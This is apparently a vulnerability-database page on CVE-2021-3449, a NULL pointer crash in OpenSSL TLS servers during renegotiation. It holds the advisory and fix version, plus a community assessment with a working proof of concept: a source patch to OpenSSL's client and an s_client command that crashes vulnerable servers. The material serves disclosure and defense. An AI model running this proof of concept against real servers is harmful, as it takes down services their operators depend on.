OpenSSL TLS Server Crash (NULL pointer dereference) — CVE-2021-3449

An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j).

Recent assessments:

zeroSteiner at March 26, 2021 2:54pm UTC reported:

The exploitation of this vulnerability would be most easily accomplished using a patched version of OpenSSL to modify the extensions sent within the ClientHello of the renegotiation. Successful exploitation of this vulnerability is likely limited to a Denial of Service condition. Allocating and setting the contents of the NULL page is extremely unlikely from the vantage point of a remote attacker.

The following patch can be applied to OpenSSL 1.1.1k (commit fd78df59) to generate a build capable of reproducing the vulnerability.

index ce8a75794c..3e3f774dab 100644
--- a/ssl/statem/extensions_clnt.c
+++ b/ssl/statem/extensions_clnt.c
@@ -272,7 +272,7 @@ EXT_RETURN tls_construct_ctos_sig_algs(SSL *s, WPACKET *pkt,
         return EXT_RETURN_NOT_SENT;
 
     salglen = tls12_get_psigalgs(s, 1, &salg);
-    if (!WPACKET_put_bytes_u16(pkt, TLSEXT_TYPE_signature_algorithms)
+    if (!WPACKET_put_bytes_u16(pkt, (s->renegotiate ? TLSEXT_TYPE_signature_algorithms_cert : TLSEXT_TYPE_signature_algorithms))
                /* Sub-packet for sig-algs extension */
             || !WPACKET_start_sub_packet_u16(pkt)
                /* Sub-packet for the actual list */

What this change is doing is swapping the signature_algorithms extension for signature_algorithms_cert when the SSL context is renegotiating.

With a patched version of OpenSSL built, run the openssl client, specifying TLS version 1.2 and renegotiate.

echo R | apps/openssl s_client -connect target:443 -msg -tls1_2

Assessed Attacker Value: 3
Assessed Attacker Value: 3Assessed Attacker Value: 4